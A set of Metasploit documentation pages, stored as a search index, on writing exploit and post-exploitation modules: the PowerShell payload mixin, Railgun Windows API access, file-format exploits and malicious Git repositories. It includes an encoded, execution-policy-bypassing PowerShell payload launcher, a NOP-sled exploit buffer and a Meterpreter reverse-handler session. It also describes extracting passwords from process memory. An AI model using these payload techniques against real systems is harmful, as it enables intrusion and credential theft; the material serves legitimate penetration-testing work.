    "content": "PowerShell is a scripting language developed by Microsoft. It provides API access to almost everything on a Windows platform, is less detectable by countermeasures and easy to learn, and is therefore incredibly powerful for penetration testing during post exploitation, or for exploit development for payload execution. Take Metasploit’s windows/smb/psexec_psh.rb module for example: it mimics the psexec utility from SysInternals, and the payload is compressed and executed from the command line, which allows it to be somewhat stealthy against antivirus. There are fewer than 30 lines of code in psexec_psh.rb (excluding the metadata that describes what the module is about), because most of the work is done by the Powershell mixin; nothing is easier than that. The command line will automatically attempt to detect the architecture (x86 or x86_64) that it is being run in, as well as the payload architecture that it contains. If there is a mismatch it will spawn the correct PowerShell architecture to inject the payload into, so there is no need to worry about the architecture of the target system. Requirements . To use the PowerShell mixin, make sure you meet these requirements: . | The target machine supports PowerShell. Vista or newer should support it. | You must have permission to execute powershell.exe | You must be able to supply system command arguments. | You must set up a command execution type attack in order to execute powershell.exe | . Usage . | To add PowerShell to your module, first you need to require it: | . require 'msf/core/exploit/powershell' . | And then include the mixin within the scope of the Metasploit3 class (or maybe Metasploit4 for some) | . include Msf::Exploit::Powershell . | Use the cmd_psh_payload method to generate the PowerShell payload. | . cmd_psh_payload(payload.encoded, payload_instance.arch.first) . The actual output of cmd_psh_payload is a system command, which would look like the following format (as a one-liner): . 
%COMSPEC% /B /C start powershell.exe -Command $si = New-Object System.Diagnostics.ProcessStartInfo;$si.FileName = 'powershell.exe'; $si.Arguments = ' -EncodedCommand [BASE64 PAYLOAD] '; $si.UseShellExecute = $false; $si.RedirectStandardOutput = $true;$si.WindowStyle = 'Hidden'; $si.CreateNoWindow = $True; $p = [System.Diagnostics.Process]::Start($si); . A number of options can be used to adjust the final command depending on the circumstances of the exploit. By default the script is compressed but no encoding of the wrapper takes place. This produces a small command of around 2000 characters (depending on the payload). Of these options, encode_final_payload is the most noteworthy, as it will Base64 encode the full payload, giving a very simple command with very few bad characters. However, the command length will increase as a result. Combining this with remove_comspec means the payload would very simply be: . powershell.exe -nop -ep bypass -e AAAABBBBCCCCDDDD.....== . Check out the other advanced options in the API documentation below. References . | https://docs.metasploit.com/api/Msf/Exploit/Powershell.html | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/powershell.rb | https://github.com/rapid7/metasploit-framework/blob/master/data/exploits/powershell/powerdump.ps1 | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-powershell-in-an-exploit.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-powershell-in-an-exploit.html"
  },"397": {
    "doc": "Railgun",
    "title": "Defining a DLL and its functions",
    "content": "The Windows API is obviously quite large, so by default Railgun only comes with a handful of pre-defined DLLs and functions that are commonly used for building a Windows program. These built-in DLLs are: advapi32, crypt32, dbghelp, iphlpapi, kernel32, netapi32, ntdll, psapi, shell32, spoolss, user32, version, winspool, wlanapi, wldap32, and ws2_32. The same list of built-in DLLs can also be retrieved by using the known_library_names method. All DLL definitions are found in the “def” directory, where they are defined as classes. The following template should demonstrate how a DLL is actually defined: . # -*- coding: binary -*- module Rex module Post module Meterpreter module Extensions module Stdapi module Railgun module Def class Def_windows_somedll def self.create_library(constant_manager, library_path = 'somedll') dll = Library.new(library_path, constant_manager) # 1st argument = Name of the function # 2nd argument = Return value's data type # 3rd argument = An array of parameters dll.add_function('SomeFunction', 'DWORD',[ ['DWORD','hwnd','in'] ]) return dll end end end; end; end; end; end; end; end . In function definitions, Railgun supports these data types: BOOL, BYTE, DWORD, LPVOID, PBLOB, PCHAR, PDWORD, PULONG_PTR, PWCHAR, ULONG_PTR, VOID, WORD. There are four parameter/buffer directions: in, out, inout, and return. When you pass a value to an “in” parameter, Railgun handles the memory management. For example, MessageBoxA has an “in” parameter named lpText, which is of type PCHAR. You can simply pass a Ruby string to it, and Railgun handles the rest; it’s all pretty straightforward. An “out” parameter will always be of a pointer datatype. Basically you tell Railgun how many bytes to allocate for the parameter, it allocates memory, provides a pointer to it when calling the function, and then it reads that region of memory that the function wrote, converts that to a Ruby object and adds it to the return hash. 
Some datatypes such as LPVOID and ULONG_PTR have a size that is determined based on the host architecture, e.g. 32-bit versions of Windows use 4-byte/32-bit values. For cross compatibility, the number 4 (for 4 bytes) can be used as the size for these values on both 32-bit and 64-bit systems. The number four comes from the size used for these types in the original 32-bit implementation and was selected to maintain backwards compatibility when 64-bit support was added. An “inout” parameter serves as an input to the called function, but can potentially be modified by it. You can inspect the return hash for the modified value like an “out” parameter. The fourth type, “return”, is used as the return data type. It is passed to #add_function after the function name argument. A quick way to define a new function (or redefine an existing function) at runtime is shown in the following example: . client.railgun.add_function('user32', 'MessageBoxA', 'DWORD',[ ['DWORD','hWnd','in'], ['PCHAR','lpText','in'], ['PCHAR','lpCaption','in'], ['DWORD','uType','in'] ]) . However, if this function will most likely be used more than once, or it’s part of the Windows API, then you should put it into the library. ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html#defining-a-dll-and-its-functions",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html#defining-a-dll-and-its-functions"
  },"398": {
    "doc": "Railgun",
    "title": "Usage",
    "content": "The best way to try Railgun is with irb in a Windows Meterpreter prompt. Here’s an example of how to get there: . $ msfconsole -q msf &amp;gt; use exploit/multi/handler msf exploit(handler) &amp;gt; run [*] Started reverse handler on 192.168.1.64:4444 [*] Starting the payload handler... [*] Sending stage (769536 bytes) to 192.168.1.106 [*] Meterpreter session 1 opened (192.168.1.64:4444 -&amp;gt; 192.168.1.106:55148) at 2014-07-30 19:49:35 -0500 meterpreter &amp;gt; irb [*] Starting IRB shell... [*] You are in the \"client\" (session) object &amp;gt;&amp;gt; . Note that when you’re running a post module or in irb, you always have a client or session object to work with; both point to the same thing, which in this case is Msf::Sessions::Meterpreter_x86_Win. This Meterpreter session object gives you API access to the target machine, including the Railgun object Rex::Post::Meterpreter::Extensions::Stdapi::Railgun::Railgun. Here’s how you simply access it: . railgun . If you run the above in irb, you will see that it returns information about all the DLLs, functions, constants, etc, except it’s a little unfriendly to read because there’s so much data. Fortunately, there are some handy tricks to help us to figure things out. For example, like we mentioned before, if you’re not sure what DLLs are loaded, you can call the known_library_names method: . &amp;gt;&amp;gt; railgun.known_library_names =&amp;gt; [\"kernel32\", \"ntdll\", \"user32\", \"ws2_32\", \"iphlpapi\", \"advapi32\", \"shell32\", \"netapi32\", \"crypt32\", \"wlanapi\", \"wldap32\", \"version\", \"psapi\", \"dbghelp\", \"winspool\", \"spoolss\"] . Now, say we’re interested in user32 and we want to find all the available functions (as well as each return value’s data type and parameters), another handy trick is this: . railgun.user32.functions.each_pair {|n, v| puts \"Function name: #{n}, Returns: #{v.return_type}, Params: #{v.params}\"} . 
Note that if you happen to call an invalid or unsupported Windows function, a RuntimeError will be raised, and the error message also shows a list of available functions. To call a Windows API function, call the Ruby function of the desired name on the corresponding library (DLL) object. For example, to call user32!MessageBoxA: . &amp;gt;&amp;gt; railgun.user32.MessageBoxA(0, \"hello, world\", \"hello\", \"MB_OK\") =&amp;gt; {\"GetLastError\"=&amp;gt;0, \"ErrorMessage\"=&amp;gt;\"The operation completed successfully.\", \"return\"=&amp;gt;1} . As you can see, this API call returns a hash. The “return” key is the return value of the function, as defined by its declared datatype. If the return type is a pointer to a known type (a pointer other than LPVOID, such as PCHAR), then the “return” key will be the value of that type and an additional “&amp;amp;return” key will be included. The “&amp;amp;return” key, when present, is the address in memory at which the “return” value is located. This is useful when the caller needs to both access the value and have the ability to free it at a later time. Note that in these cases, if the pointer is NULL, “return” will always be Ruby’s nil value and “&amp;amp;return” will be 0. The “GetLastError” key is the thread’s last-error code, as returned by kernel32!GetLastError. This value is useful for determining whether the function call was successful and, if not, why it failed. The “ErrorMessage” key is a human-readable description of the corresponding “GetLastError” code. When making a function call through Railgun, it’s important to inspect the results to determine whether it was successful before processing any results. There is no error handling for native API calls, so simple mistakes like accessing invalid memory locations will cause the session to close as the host process crashes. ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html#usage",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html#usage"
  },"399": {
    "doc": "Railgun",
    "title": "Memory Reading and Writing",
    "content": "The Railgun class also has useful methods that you will probably use: memread and memwrite. The names are pretty self-explanatory: You read a block of memory, or you write to a region of memory. We’ll demonstrate this with a new block of memory in the payload itself: . &amp;gt;&amp;gt; process = sys.process.open(sys.process.getpid, PROCESS_ALL_ACCESS) =&amp;gt; #&amp;lt;#&amp;lt;Class:0x007fe2e051b740&amp;gt;:0x007fe2c5a258a0 @client=#&amp;lt;Session:meterpreter 192.168.1.106:55151 (192.168.1.106) \"WIN-6NH0Q8CJQVM\\sinn3r @ WIN-6NH0Q8CJQVM\"&amp;gt;, @handle=448, @channel=nil, @pid=2268, @aliases={\"image\"=&amp;gt;#&amp;lt;Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Image:0x007fe2c5a25828 @process=#&amp;lt;#&amp;lt;Class:0x007fe2e051b740&amp;gt;:0x007fe2c5a258a0 ...&amp;gt;&amp;gt;, \"io\"=&amp;gt;#&amp;lt;Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::IO:0x007fe2c5a257b0 @process=#&amp;lt;#&amp;lt;Class:0x007fe2e051b740&amp;gt;:0x007fe2c5a258a0 ...&amp;gt;&amp;gt;, \"memory\"=&amp;gt;#&amp;lt;Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Memory:0x007fe2c5a25738 @process=#&amp;lt;#&amp;lt;Class:0x007fe2e051b740&amp;gt;:0x007fe2c5a258a0 ...&amp;gt;&amp;gt;, \"thread\"=&amp;gt;#&amp;lt;Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Thread:0x007fe2c5a256c0 @process=#&amp;lt;#&amp;lt;Class:0x007fe2e051b740&amp;gt;:0x007fe2c5a258a0 ...&amp;gt;&amp;gt;}&amp;gt; &amp;gt;&amp;gt; address = process.memory.allocate(1024) =&amp;gt; 5898240 . As you can see, the new allocation is at the previously allocated address. Let’s first write some data to it: . &amp;gt;&amp;gt; railgun.memwrite(address, \"AAAA\\x00\".b) =&amp;gt; true . memwrite returns true, which means successful. Now let’s read 4 bytes from the same address: . &amp;gt;&amp;gt; railgun.memread(address, 4) =&amp;gt; \"AAAA\" . 
Be aware that if you supply a bad pointer, you can cause an access violation and crash Meterpreter. Reading and Writing Strings . Railgun also has a number of useful utility methods in railgun.util. For example, the #read_string method can be used to read an ASCII string from memory. A read_wstring variant can be used to read UTF-16 strings. &amp;gt;&amp;gt; railgun.util.read_string(address) =&amp;gt; \"AAAA\" . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html#memory-reading-and-writing",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html#memory-reading-and-writing"
  },"400": {
    "doc": "Railgun",
    "title": "References:",
    "content": ". | https://www.youtube.com/watch?v=AniR-T0AnnI | https://www.defcon.org/images/defcon-20/dc-20-presentations/Maloney/DEFCON-20-Maloney-Railgun.pdf | https://github.com/rapid7/metasploit-framework/tree/master/lib/rex/post/meterpreter/extensions/stdapi/railgun | http://msdn.microsoft.com/en-us/library/ms681381(VS.85).aspx | http://msdn.microsoft.com/en-us/library/aa383749 | http://undocumented.ntinternals.net/ | http://source.winehq.org/WineAPI/ | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html#references",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html#references"
  },"401": {
    "doc": "Railgun",
    "title": "Railgun",
    "content": "Railgun is a very powerful post-exploitation feature exclusive to the Windows and Python Meterpreters. It allows you to have complete control of your target machine’s Windows API, or you can use whatever DLL you find and do even more creative stuff with it. For example: say you have a Meterpreter session on a Windows target. You have your eyes on a particular application that you believe stores the user’s password, but it is encrypted and there are no tools out there for decryption. With Railgun, you can either tap into the process and grep for any sensitive information found in memory, or you can look for the program’s DLL that’s responsible for the decryption, call it, and let it decrypt it for you. If you’re a penetration tester, obviously post exploitation is an important skill to have, but if you don’t know Railgun, you are missing out on a lot. ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html"
  },"402": {
    "doc": "How to use the Favorite command",
    "title": "Using the Favorite Command",
    "content": "favorite is an msfconsole command that allows users to easily keep track of their most-used modules. The favorites list is stored in the .msf4/fav_modules file. Adding modules to the favorites list . There are two methods of adding a module to the favorites list. The first way is via simply calling favorite when there is an active module: . msf6 exploit(multi/handler) &amp;gt; favorite [+] Added exploit/multi/handler to the favorite modules file . Calling favorite without an active module will print the favorite command help output: . msf6 &amp;gt; favorite [-] No module has been provided to favorite. Usage: favorite [mod1 mod2 ...] Add one or multiple modules to the list of favorite modules stored in /home/msf/.msf4/fav_modules If no module name is specified, the command will add the active module if there is one OPTIONS: -c Clear the contents of the favorite modules file -d Delete module(s) or the current active module from the favorite modules file -h Help banner -l Print the list of favorite modules (alias for `show favorites`) . The second method of adding favorites allows adding multiple modules at once: . msf6 &amp;gt; favorite exploit/multi/handler exploit/windows/smb/psexec [+] Added exploit/multi/handler to the favorite modules file [+] Added exploit/windows/smb/psexec to the favorite modules file msf6 &amp;gt; show favorites Favorites ========= # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/handler manual No Generic Payload Handler 1 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution . Deleting modules from the favorites list . Modules can be deleted from the favorites list individually or by clearing the contents of the list. For the former, simply use the -d flag and either supply the module name or use the currently active module if that module is in the favorites list. For the latter, supply the -c flag. 
Deleting an active module from favorites list . msf6 exploit(multi/handler) &amp;gt; favorite -d [*] Removing exploit/multi/handler from the favorite modules file . Specifying module(s) to delete . msf6 &amp;gt; favorite -d exploit/multi/handler exploit/windows/smb/psexec [*] Removing exploit/multi/handler from the favorite modules file [*] Removing exploit/windows/smb/psexec from the favorite modules file . Clearing the favorites list . msf6 &amp;gt; show favorites Favorites ========= # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/handler manual No Generic Payload Handler 1 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution msf6 &amp;gt; favorite -c [+] Favorite modules file cleared msf6 &amp;gt; show favorites [!] The favorite modules file is empty . Printing the list of favorite modules . The list of favorite modules can be printed by supplying the -l flag. This is an alias for the show favorites and favorites commands. msf6 &amp;gt; favorite -l Favorites ========= # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/handler manual No Generic Payload Handler 1 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution . ",
    "url": "/docs/using-metasploit/other/how-to-use-the-favorite-command.html#using-the-favorite-command",
    "relUrl": "/docs/using-metasploit/other/how-to-use-the-favorite-command.html#using-the-favorite-command"
  },"403": {
    "doc": "How to use the Favorite command",
    "title": "How to use the Favorite command",
    "content": " ",
    "url": "/docs/using-metasploit/other/how-to-use-the-favorite-command.html",
    "relUrl": "/docs/using-metasploit/other/how-to-use-the-favorite-command.html"
  },"404": {
    "doc": "Fileformat",
    "title": "Fileformat",
    "content": "Msf::Exploit::FILEFORMAT is the mixin to use to create a file format exploit. There actually isn’t much in the mixin, but the most important method is this: file_create: . Usage for file_create . As the name implies, the file_create method allows you to create a file. You should be using this method because it does more than just writing data to disk. One of the important things it does is report the file creation to the database in the format of #{ltype}.localpath, and the file will always be written to Metasploit’s local directory defined in Msf::Config.local_directory (by default this path is ~/.msf4/local), which keeps files nice and organized. To use the mixin, first include Msf::Exploit::FILEFORMAT under the scope of your Metasploit3 class: . include Msf::Exploit::FILEFORMAT . And here’s an example of using file_create to build an imaginary exploit: . # This is my imaginary exploit buf = \"\" buf &amp;lt;&amp;lt; \"A\" * 1024 buf &amp;lt;&amp;lt; [0x40201f01].pack(\"V\") buf &amp;lt;&amp;lt; \"\\x90\" * 10 buf &amp;lt;&amp;lt; payload.encoded file_create(buf) . Custom filename . The Msf::Exploit::FILEFORMAT mixin by default has a registered FILENAME datastore option, and it is actually optional. If there’s no filename provided, the mixin will set the name in this format: \"exploit.fileformat.#{self.shortname}\", where self.shortname means the shorter version of the module name. If you wish to set a default one (but still changeable by the user), then you simply register it again in the module, like this: . register_options( [ OptString.new('FILENAME', [true, 'The malicious file name', 'msf.jpg']) ], self.class) . Fixed filename . Occasionally, you might not want your user to change the filename at all. A lazy trick to do that is by modifying the FILENAME datastore option at runtime, but this is very much not recommended. In fact, if you do this, you will not pass msftidy. Instead, here’s how it’s done properly: . 
1 - Deregister the FILENAME option . deregister_options('FILENAME') . 2 - Next, override the file_format_filename method, and make it return the filename you want: . def file_format_filename 'something.jpg' end . 3 - Finally, please leave a note about this in the module description. References . | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/fileformat.rb | https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/windows/local | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-fileformat-mixin-to-create-a-file-format-exploit.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-fileformat-mixin-to-create-a-file-format-exploit.html"
  },"405": {
    "doc": "Git Mixin",
    "title": "Git Mixin",
    "content": "This page walks through the process of creating an exploit module for vulnerable Git clients. Building a Repository . Many of the existing Git exploits in Metasploit rely on being able to host a valid repository that a Git client can successfully clone. So to get started with building an exploit, the contents of the repo need to be decided on first. Let’s say that the repository is something like the following: . space@vm:~/test-repo$ ls -al total 20 drwxrwxr-x 4 space space 4096 Sep 16 14:06 . drwxr-x--- 23 space space 4096 Sep 16 14:05 .. drwxrwxr-x 2 space space 4096 Sep 16 14:06 dir -rw-rw-r-- 1 space space 10 Sep 16 14:06 file.txt drwxrwxr-x 7 space space 4096 Sep 16 14:06 .git space@vm:~/test-repo$ ls -al dir total 12 drwxrwxr-x 2 space space 4096 Sep 16 14:06 . drwxrwxr-x 4 space space 4096 Sep 16 14:06 .. -rw-rw-r-- 1 space space 5 Sep 16 14:06 test_file.txt . The .git directory is the only component of the repository that won’t be sent, so the repository will consist of the file.txt, the dir folder, and the test_file.txt file that lives within the dir folder. Every file and directory inside the repo is represented as a Git object: File contents are represented as blob objects which get coupled together to form a tree object. Lastly, a commit object is created to hold information about the tree object, including the tree’s sha, the author of the commit, a commit message, etc. There will need to be two tree objects to represent the contents of dir and the contents of the root of the repository. Starting with the contents of dir, a blob object needs to be created to represent the contents of test_file.txt: . space@vm:~/test-repo$ cat dir/test_file.txt test . The Git mixin contains the functionality for building a Git object. To build a blob object, the build_blob_object() class method should be used: . 
&amp;gt;&amp;gt; contents = \"test\\n\" =&amp;gt; \"test\\n\" &amp;gt;&amp;gt; blob = Msf::Exploit::Git::GitObject.build_blob_object(contents) =&amp;gt; #&amp;lt;Msf::Exploit::Git::GitObject:0x00007fe163c75cd0 . The resulting object will contain the object type, its original contents, its compressed contents, its sha, and its path (where the commit object will be stored client side). Since this will be the only file in the dir folder, the tree object can be created with Msf::Exploit::Git::GitObject.build_tree_object(). A tree object is represented differently, holding information about each file contained in the directory, such as file permissions, file name, object type, and the file’s sha1 hash. Because of that, the build_tree_object() expects a hash or an array of hashes, where each hash looks like the following: . &amp;gt;&amp;gt; tree_entry = { mode: '100644', file_name: 'test_file.txt', sha1: blob.sha1 } . And using that, the tree object can now be created: . &amp;gt;&amp;gt; tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_entry) =&amp;gt; #&amp;lt;Msf::Exploit::Git::GitObject:0x00007fe161b0cd78 . Now that the dir folder is represented in Git objects, we can represent the root of the repository. That just requires creating a blob object for file.txt, creating a tree object representing the top-level directory, and finally a commit object. Again, a blob object needs to be created to represent the contents of the remaining file: . space@vm:~/test-repo$ cat file.txt some text . &amp;gt;&amp;gt; contents = \"some text\\n\" =&amp;gt; \"some text\\n\" &amp;gt;&amp;gt; file_blob = Msf::Exploit::Git::GitObject.build_blob_object(contents) =&amp;gt; #&amp;lt;Msf::Exploit::Git::GitObject:0x00007fe163bf54b8 ... Then, a new tree object needs to be created to represent the top-level directory, which includes file.txt and the dir folder: . 
?&amp;gt; entries = [ ?&amp;gt; { ?&amp;gt; mode: '100644', ?&amp;gt; file_name: 'file.txt', ?&amp;gt; sha1: file_blob.sha1 ?&amp;gt; }, ?&amp;gt; { ?&amp;gt; mode: '040000', ?&amp;gt; file_name: 'dir', ?&amp;gt; sha1: tree_object.sha1 ?&amp;gt; } &amp;gt;&amp;gt; ] =&amp;gt; [{:mode=&amp;gt;\"100644\", :file_name=&amp;gt;\"file.txt\", :sha1=&amp;gt;\"b649a9bf89116c581f8329b8ec3c79a86a70... &amp;gt;&amp;gt; top_level_obj = Msf::Exploit::Git::GitObject.build_tree_object(entries) . The build_commit_object() method takes a hash that expects the sha1 hash for the tree created, the sha1 hash for the parent commit if one exists, and optional data such as an author name, email address, company name, commit message, etc. If the user chooses not to pass in the optional data, Faker will generate random data for them. &amp;gt;&amp;gt; commit_object = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: top_level_obj.sha1) =&amp;gt; #&amp;lt;Msf::Exploit::Git::GitObject:0x00007fe1533ac848 ... 
&amp;gt;&amp;gt; commit_object =&amp;gt; #&amp;lt;Msf::Exploit::Git::GitObject:0x00007fe1533ac848 @compressed= \"x\\x9C\\x95\\xCEA\\x0E\\xC2 \\x10\\x05P\\xD7\\x9Cb&amp;lt;@\\r\\x1DZ\\xCA\\xC2\\x18\\xE3\\xCE\\xA8g0XF!\\xB6\\xD0\\x00]x{I\\xED\\x05\\\\\\xCD\\xE4'\\xF3\\xFE\\xF4a\\x1C]\\x06\\x14j\\x93#\\x11pe\\b\\el5u]cL#\\xD1\\x18\\xC9\\x05\\x97\\x92\\x04*\\xF3h\\xA5P}\\xC7\\x89\\xE99\\xDB\\x10\\xE1\\xEA\\x92\\xF6&amp;amp;j\\xB8\\xCC\\x93\\xD5\\x03\\xEC\\xDF\\xCB\\xBC\\x0Fk~\\xB43\\ri\\xE7)\\x1F\\xA0\\xAEU[\\x10l\\x05T\\x85\\xE4\\xAC_\\xCA3\\xFD\\xC7\\xA8\\x0E%\\nQ\\xE3\\xAA\\xB0\\xB3w\\xD9\\x95\\xA3\\x1F\\a9@\\x98\\xC8\\xC3\\xAB\\xEC\\x91\\xA6\\x90\\\\\\x0E\\xF1\\x03\\xCF\\xF2\\xED\\xC9\\xF9T\\xDD\\x82\\x8D[\\xF6\\x05s\\xF7P\\x89\", @content= \"tree 08de2425ae774dd462dd603066e328db5638c70e\\nauthor Lisandra Kuphal &amp;lt;[email protected]&amp;gt; 1185328253 -0300\\ncommitter Lisandra Kuphal &amp;lt;[email protected]&amp;gt; 872623312 -0300\\n\\nInitial commit to open git repository for Bins-Mohr!\\n\", @path=\"01/8856fe17403b0991e5d1d3eb7f62dca4d8e951\", @sha1=\"018856fe17403b0991e5d1d3eb7f62dca4d8e951\", @type=\"commit\"&amp;gt; . That’s all that is needed to create a valid repository in Metasploit. Hosting the Repository . Metasploit’s current implementation of the Git protocol works over HTTP (SmartHttp docs), so to host a malicious repository with Metasploit, the exploit module needs to leverage the Msf::Exploit::Remote::HttpServer mixin. Additionally, the Git and Git SmartHttp mixins need to be included to build objects and create appropriate responses for the client’s requests. The module should look similar to other exploit modules that use the HttpServer mixin, defining an on_request_uri() method, a primer() method, and an exploit() method. The primer() method is first to execute, so setup for things like the repository uri can happen there: . 
# Creates a random uri for the Git repo, ensuring that there are no spaces def create_git_uri \"/#{Faker::App.name.downcase}.git\".gsub(' ', '-') end # Uses GIT_URI datastore option or randomly generates a repo URI # Registers the URI with the http server and prints the entire path that client should pass to git clone def primer @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI'] @git_addr = URI.parse(get_uri).merge(@git_repo_uri) print_status(\"Git repository to clone: #{@git_addr}\") hardcoded_uripath(@git_repo_uri) end . Next, the exploit() method can be used to set up the repository. The code used in the Building a Repository section can be placed here before entering the listen / accept loop. The on_request_uri() method is where most of the module logic will live. No matter what the client sends, the request should first be parsed by Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(). The parse_raw_request() method will format the request so it is easier to work with. The first request that a client will send when cloning a repository is a reference discovery request. The client will expect things like server capabilities and the reference that HEAD points to in the response. Since this is a simple repo only one branch will exist, so HEAD will point to refs/heads/master and refs/heads/master will point to the latest commit in the repo, which in this case is the only commit in the repo. This can be represented as the following hash: . refs = { 'HEAD' =&amp;gt; 'refs/heads/master', 'refs/heads/master' =&amp;gt; commit_object.sha1 } . Creating a proper response to a ref-discovery request is done through Msf::Exploit::Git::SmartHttp.get_ref_discovery_response(). It takes two parameters: The request object from parse_raw_request() and the above refs hash. After the response is built, it can be sent back to the client.: . response = get_ref_discovery_response(request, @refs) cli.send_response(response) . 
If the client successfully receives the ref-discovery response, it will then send an upload-pack request. The upload-pack request is a POST request containing the client’s capabilities and a ‘want’ list for objects in the repository. To create a proper response, the Msf::Exploit::Git::SmartHttp.get_upload_pack_response() method should be used. Again, this method accepts two arguments. The first is the parsed request from the client, and the second is an array of all objects that exist in the repo. The get_upload_pack_response() method will check the sha1 hash of each object against the hashes in the want list that the client sent and send only the requested object hashes. response = get_upload_pack_response(request, @git_objs) cli.send_response(response) . Upon receiving the upload-pack response from the server, the client will build out the repository. Putting it all together, the module should look something like the following: . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule &amp;lt; Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Git include Msf::Exploit::Git::SmartHttp include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'Git Clone Test', 'Description' =&amp;gt; %q{ }, 'License' =&amp;gt; MSF_LICENSE, 'Author' =&amp;gt; [ ], 'References' =&amp;gt; [ ], 'DisclosureDate' =&amp;gt; '2022-09-22', 'Platform' =&amp;gt; [ 'unix' ], 'Arch' =&amp;gt; ARCH_CMD, 'Targets' =&amp;gt; [ [ 'Automatic Target', {}] ], 'DefaultTarget' =&amp;gt; 0, 'Notes' =&amp;gt; {} ) ) register_options( [ OptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ]) ] ) deregister_options('RHOSTS', 'RPORT') end def exploit setup_repo_structure super end def setup_repo_structure # create blob object for contents of 'test_file.txt' contents = \"test\\n\" blob = 
Msf::Exploit::Git::GitObject.build_blob_object(contents) # create tree object representing 'test_file.txt' in 'dir' folder tree_entry = { mode: '100644', file_name: 'test_file.txt', sha1: blob.sha1 } tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_entry) # create blob object for contents of 'file.txt' contents = \"some text\\n\" file_blob = Msf::Exploit::Git::GitObject.build_blob_object(contents) # create tree object representing top-level directory of repo entries = [ { mode: '100644', file_name: 'file.txt', sha1: file_blob.sha1 }, { mode: '040000', file_name: 'dir', sha1: tree_object.sha1 } ] top_level_obj = Msf::Exploit::Git::GitObject.build_tree_object(entries) # create commit commit_object = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: top_level_obj.sha1) # create list of objects in repository, as the # client will request them to build the repository @git_objs = [ commit_object, top_level_obj, tree_object, file_blob, tree_object, blob ] @refs = { 'HEAD' =&amp;gt; 'refs/heads/master', 'refs/heads/master' =&amp;gt; commit_object.sha1 } end def create_git_uri \"/#{Faker::App.name.downcase}.git\".gsub(' ', '-') end def primer @git_repo_uri = datastore['GIT_URI'].empty? ? 
create_git_uri : datastore['GIT_URI'] @git_addr = URI.parse(get_uri).merge(@git_repo_uri) print_status(\"Git repository to clone: #{@git_addr}\") hardcoded_uripath(@git_repo_uri) end def on_request_uri(cli, req) request = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req) case request.type when 'ref-discovery' response = get_ref_discovery_response(request, @refs) fail_with(Failure::UnexpectedReply, 'Git client did not send a valid ref-discovery request') unless response when 'upload-pack' response = get_upload_pack_response(request, @git_objs) fail_with(Failure::UnexpectedReply, 'Git client did not send a valid upload-pack request') unless response else fail_with(Failure::UnexpectedReply, 'Git client did not send a valid request') end cli.send_response(response) end end . Running the module . The module will start the http server and print the repo to clone . msf6 &amp;gt; use exploit/multi/http/git_clone_test [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp msf6 exploit(multi/http/git_clone_test) &amp;gt; set srvport 9999 srvport =&amp;gt; 9999 msf6 exploit(multi/http/git_clone_test) &amp;gt; set lhost 192.168.140.1 lhost =&amp;gt; 192.168.140.1 msf6 exploit(multi/http/git_clone_test) &amp;gt; set srvhost 192.168.140.1 srvhost =&amp;gt; 192.168.140.1 msf6 exploit(multi/http/git_clone_test) &amp;gt; run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. msf6 exploit(multi/http/git_clone_test) &amp;gt; [*] Started reverse TCP handler on 192.168.140.1:4444 [*] Using URL: http://192.168.140.1:9999/MOYuJfC [*] Server started. [*] Git repository to clone: http://192.168.140.1:9999/y-find.git . Once the repository is cloned, you should expect to see the same contents as the test-repo at the beginning of this document: . space@ubuntu:~$ git clone http://192.168.140.1:9999/y-find.git Cloning into 'y-find'... remote: Enumerating objects: 6, done. remote: Counting objects: 100% (6/6), done. 
